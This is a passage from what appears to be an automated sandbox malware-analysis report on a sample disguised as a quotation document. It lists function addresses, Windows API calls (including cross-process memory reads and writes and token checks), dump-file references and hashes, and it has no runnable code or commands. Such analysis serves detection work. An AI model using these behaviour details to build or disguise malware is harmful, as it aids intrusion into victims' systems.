                                                                            • Opcode ID: 595c5aa419bba969082a22a6f23329be9cf6d40de348af7cc99cb09d26107537
                                                                            • Instruction ID: da6660a2e51ed2ae817dfac063adfb327fe3cff74ee41337d34667525721c31a
                                                                            • Opcode Fuzzy Hash: 595c5aa419bba969082a22a6f23329be9cf6d40de348af7cc99cb09d26107537
                                                                            • Instruction Fuzzy Hash: 1FF04F35200701ABDB214FA5DC49FA63B6EFF8A761F244414F949CB651CA71DC40CA60
                                                                            Function 00691014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0069102A
                                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00691036
                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00691045
                                                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0069104C
                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00691062
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                            • String ID:
                                                                            • API String ID: 44706859-0
                                                                            • Opcode ID: 3b2a89806c100c38da38f1b8401fd5c9e277ecac6f3786d85656e5d19712f365
                                                                            • Instruction ID: 3df227716a0701eb82a87f29e41b034819e2da5cf4739c777b4baeb66fe4f23f
                                                                            • Opcode Fuzzy Hash: 3b2a89806c100c38da38f1b8401fd5c9e277ecac6f3786d85656e5d19712f365
                                                                            • Instruction Fuzzy Hash: 4CF06235200705EBDB215FA5EC49FA63B6FFF8A761F240414F949CB650CE72D8808A60
                                                                            Function 006A030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CloseHandle.KERNEL32(?,?,?,?,006A017D,?,006A32FC,?,00000001,00672592,?), ref: 006A0324
                                                                            • CloseHandle.KERNEL32(?,?,?,?,006A017D,?,006A32FC,?,00000001,00672592,?), ref: 006A0331
                                                                            • CloseHandle.KERNEL32(?,?,?,?,006A017D,?,006A32FC,?,00000001,00672592,?), ref: 006A033E
                                                                            • CloseHandle.KERNEL32(?,?,?,?,006A017D,?,006A32FC,?,00000001,00672592,?), ref: 006A034B
                                                                            • CloseHandle.KERNEL32(?,?,?,?,006A017D,?,006A32FC,?,00000001,00672592,?), ref: 006A0358
                                                                            • CloseHandle.KERNEL32(?,?,?,?,006A017D,?,006A32FC,?,00000001,00672592,?), ref: 006A0365
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2962429428-0
                                                                            • Opcode ID: 395a0aba2be4b00fab66cb645759c345d4d7930f229da0a0259d453c41530203
                                                                            • Instruction ID: 6b71d799e084f71c53d4040df81e5ddba163bab31bbacf67dae3e94de7bdbcba
                                                                            • Opcode Fuzzy Hash: 395a0aba2be4b00fab66cb645759c345d4d7930f229da0a0259d453c41530203
                                                                            • Instruction Fuzzy Hash: 5401AE76800B169FDB30AF66D880852FBFABF613153158A3FD19652A31C3B1AD58DF80
                                                                            Function 00695C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00695C58
                                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 00695C6F
                                                                            • MessageBeep.USER32(00000000), ref: 00695C87
                                                                            • KillTimer.USER32(?,0000040A), ref: 00695CA3
                                                                            • EndDialog.USER32(?,00000001), ref: 00695CBD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                            • String ID:
                                                                            • API String ID: 3741023627-0
                                                                            • Opcode ID: 5e6913e739ce20787fe399a67d52dc3bcf136ea3e02b3a230d55383f95931d54
                                                                            • Instruction ID: f28ce349d550acf7b88288895049f2702f837323eae3ad2f924c910fc08ee78d
                                                                            • Opcode Fuzzy Hash: 5e6913e739ce20787fe399a67d52dc3bcf136ea3e02b3a230d55383f95931d54
                                                                            • Instruction Fuzzy Hash: 3C016D30500B04EBEF215B15DE4EFE677BEBB00B15F00155DE687A19E1DBF0A9848B91
                                                                            Function 006495C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EndPath.GDI32(?), ref: 006495D4
                                                                            • StrokeAndFillPath.GDI32(?,?,006871F7,00000000,?,?,?), ref: 006495F0
                                                                            • SelectObject.GDI32(?,00000000), ref: 00649603
                                                                            • DeleteObject.GDI32 ref: 00649616
                                                                            • StrokePath.GDI32(?), ref: 00649631
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                            • String ID:
                                                                            • API String ID: 2625713937-0
                                                                            • Opcode ID: 613fdbb23f9565cbddf31ec33b3789ca069d684f598f21efc0ff89de113d3664
                                                                            • Instruction ID: d45ab384597543d2bf9af7ae3cacba380175845728e5842a13a223508e86dedf
                                                                            • Opcode Fuzzy Hash: 613fdbb23f9565cbddf31ec33b3789ca069d684f598f21efc0ff89de113d3664
                                                                            • Instruction Fuzzy Hash: DBF06430016288EBDB26AF29EC1CBA53B62AB00332F448314F469551F0CB399991CF28
                                                                            Function 006A581E Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 336comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00633AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00633A97,?,?,00632E7F,?,?,?,00000000), ref: 00633AC2
                                                                            • CoInitialize.OLE32(00000000), ref: 006A5995
                                                                            • CoCreateInstance.OLE32(006CFCF8,00000000,00000001,006CFB68,?), ref: 006A59AE
                                                                            • CoUninitialize.OLE32 ref: 006A59CC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize
                                                                            • String ID: .lnk
                                                                            • API String ID: 3769357847-24824748
                                                                            • Opcode ID: 74eb76c4cfc58fd19c89908141133ec65d63ee03c1d8c077025828646fe0c887
                                                                            • Instruction ID: a48a87345789874e3c66622fc1bef3c8db4c3f8a1686f4a88e23f827ae9cb3a1
                                                                            • Opcode Fuzzy Hash: 74eb76c4cfc58fd19c89908141133ec65d63ee03c1d8c077025828646fe0c887
                                                                            • Instruction Fuzzy Hash: 36D144756086019FC714EF15C490A6ABBE6FF8A720F14885DF88A9B361DB31EC45CF92
                                                                            Function 0069C5D0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 191windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0069C6EE
                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0069C79C
                                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0069C7CA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ItemMenu$Info$Default
                                                                            • String ID: 0
                                                                            • API String ID: 1306138088-4108050209
                                                                            • Opcode ID: f3fa5dc19192f276c6cecab965cfd8ab03c140f525551c50b500ba392ccf8349
                                                                            • Instruction ID: ee84b3c510d12959e9e622422b7374f3956d899c6e19ad21a11639f541f1ee87
                                                                            • Opcode Fuzzy Hash: f3fa5dc19192f276c6cecab965cfd8ab03c140f525551c50b500ba392ccf8349
                                                                            • Instruction Fuzzy Hash: 8D51F1716043009BDB509F68C885BAB77EEAF49320F040A2DF995D7AD0DB74D804DB96
                                                                            Function 00692716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0069B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006921D0,?,?,00000034,00000800,?,00000034), ref: 0069B42D
                                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00692760
                                                                              • Part of subcall function 0069B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006921FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0069B3F8
                                                                              • Part of subcall function 0069B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0069B355
                                                                              • Part of subcall function 0069B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00692194,00000034,?,?,00001004,00000000,00000000), ref: 0069B365
                                                                              • Part of subcall function 0069B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00692194,00000034,?,?,00001004,00000000,00000000), ref: 0069B37B
                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 006927CD
                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0069281A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                            • String ID: @
                                                                            • API String ID: 4150878124-2766056989
                                                                            • Opcode ID: 5c3ede0f0f719cc69f5270a7b6cabaf69e27ee571cc12fd8cb03e44b9440496c
                                                                            • Instruction ID: cd4f42c601bfe19171e0b83f28e996f8289e46888ca08a2132122a5fa230f0f8
                                                                            • Opcode Fuzzy Hash: 5c3ede0f0f719cc69f5270a7b6cabaf69e27ee571cc12fd8cb03e44b9440496c
                                                                            • Instruction Fuzzy Hash: 00413B72900218BFDF10DBA4DD51EEEBBB9AF09700F005099FA55B7581DB706E45DBA0
                                                                            Function 0069C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0069C306
                                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 0069C34C
                                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00701990,00DC9AD8), ref: 0069C395
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Delete$InfoItem
                                                                            • String ID: 0
                                                                            • API String ID: 135850232-4108050209
                                                                            • Opcode ID: 7f89a150e8cc8c28ebcad62a44d066e35336d7e00b9b4bab1b3ce7e9c790bedc
                                                                            • Instruction ID: 8fbd7e903bb11b628286280578d18d4e6056eae1a9d6facc4f98cfa36507df83
                                                                            • Opcode Fuzzy Hash: 7f89a150e8cc8c28ebcad62a44d066e35336d7e00b9b4bab1b3ce7e9c790bedc
                                                                            • Instruction Fuzzy Hash: 7F41A0712043019FDB20DF24D845F6ABBEAAF85320F04861DF8A597391D770A904CBA6
                                                                            Function 0069CF00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108filestringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0069DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0069CF22,?), ref: 0069DDFD
                                                                              • Part of subcall function 0069DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0069CF22,?), ref: 0069DE16
                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0069CF45
                                                                            • MoveFileW.KERNEL32(?,?), ref: 0069CF7F
                                                                            • SHFileOperationW.SHELL32(?), ref: 0069D061
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: FileFullNamePath$MoveOperationlstrcmpi
                                                                            • String ID: \*.*
                                                                            • API String ID: 67141772-1173974218
                                                                            • Opcode ID: baeb7670e186e49b57b0358b1e337eca07925afb184349437041191555a30dfb
                                                                            • Instruction ID: 369dbb3c70b711e545db354e59c3ca65ce517f84e2c6cbb1b23a9a8c7a51c1aa
                                                                            • Opcode Fuzzy Hash: baeb7670e186e49b57b0358b1e337eca07925afb184349437041191555a30dfb
                                                                            • Instruction Fuzzy Hash: 034158719051185FDF52EFA4D981EEDB7BEAF44390F0000EAE509EB641EA34A788CB54
                                                                            Function 006C4416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,006CCC08,00000000,?,?,?,?), ref: 006C44AA
                                                                            • GetWindowLongW.USER32 ref: 006C44C7
                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 006C44D7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long
                                                                            • String ID: SysTreeView32
                                                                            • API String ID: 847901565-1698111956
                                                                            • Opcode ID: e499065a83c708852c5ae3401cea87a0b5beccf4fc06a3da2b176cca36b15fe9
                                                                            • Instruction ID: ab7a40557162631e6675e9c9f3a79dd5dca2fbf9db517b73052c42a016d872f6
                                                                            • Opcode Fuzzy Hash: e499065a83c708852c5ae3401cea87a0b5beccf4fc06a3da2b176cca36b15fe9
                                                                            • Instruction Fuzzy Hash: 37318B31210605AFDB248E38DC55FEA7BAAEB08334F208719F979932E0DB70EC509B50
                                                                            Function 00696E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SysReAllocString.OLEAUT32(?,?), ref: 00696EED
                                                                            • VariantCopyInd.OLEAUT32(?,?), ref: 00696F08
                                                                            • VariantClear.OLEAUT32(?), ref: 00696F12
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Variant$AllocClearCopyString
                                                                            • String ID: *ji
                                                                            • API String ID: 2173805711-1642545397
                                                                            • Opcode ID: 08dd1a142b8ea50c470cef6b061586c46110021e3167913fd653122729a9aee6
                                                                            • Instruction ID: 7ce41144560f156d73f437ad6d47e3551d6b0318c5e251a8d1e5b9fce41322ea
                                                                            • Opcode Fuzzy Hash: 08dd1a142b8ea50c470cef6b061586c46110021e3167913fd653122729a9aee6
                                                                            • Instruction Fuzzy Hash: 27316B72604345DBCF09AFA5E8919BE37BBEF85310B1044A9F9038B6B1CB349916DBD4
                                                                            Function 006C3EB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 006C3F40
                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 006C3F54
                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 006C3F78
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window
                                                                            • String ID: SysMonthCal32
                                                                            • API String ID: 2326795674-1439706946
                                                                            • Opcode ID: 398fef997379cd2187e0e0729f6fa4571aa87d1356c6605741b68a257c5cf07e
                                                                            • Instruction ID: 05911152a4c6983a88c1dada07fb5cf1f03cdc7ac590c2bbb41c5385cd25dfd9
                                                                            • Opcode Fuzzy Hash: 398fef997379cd2187e0e0729f6fa4571aa87d1356c6605741b68a257c5cf07e
                                                                            • Instruction Fuzzy Hash: D221BF32600229BFDF258F50CC46FEA3B7AEF48724F114218FA156B2D0D6B5A9508B90
                                                                            Function 006C4653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 006C4705
                                                                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 006C4713
                                                                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 006C471A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$DestroyWindow
                                                                            • String ID: msctls_updown32
                                                                            • API String ID: 4014797782-2298589950
                                                                            • Opcode ID: 2c03e4c15671f77d823968899ca4baeed194c5aa0ee998c2c989ccd8964df40a
                                                                            • Instruction ID: 002ed6a31f3b674db10ff84ba1fd90d0b2f7805de886adee15568c07d1c781a4
                                                                            • Opcode Fuzzy Hash: 2c03e4c15671f77d823968899ca4baeed194c5aa0ee998c2c989ccd8964df40a
                                                                            • Instruction Fuzzy Hash: 43215CB5600209AFDB10DF64DCA5EB737AEEF4A3A4B05015DFA049B351CB30EC51CA64
                                                                            Function 006C37B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 006C3840
                                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 006C3850
                                                                            • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 006C3876
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$MoveWindow
                                                                            • String ID: Listbox
                                                                            • API String ID: 3315199576-2633736733
                                                                            • Opcode ID: 71eccb6d354e064f46e66f6e95c7fe14e838102c30e4f73b264e4aa623c776dc
                                                                            • Instruction ID: 413fe682f8d67d047e4adba58ad00b92e836c7591a0e6139959782795455d3cb
                                                                            • Opcode Fuzzy Hash: 71eccb6d354e064f46e66f6e95c7fe14e838102c30e4f73b264e4aa623c776dc
                                                                            • Instruction Fuzzy Hash: 49217F72610228BBEB219F54DC85FFB376BEF89760F118118F9059B290C6759C5287A0
                                                                            Function 006A49F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 006A4A08
                                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 006A4A5C
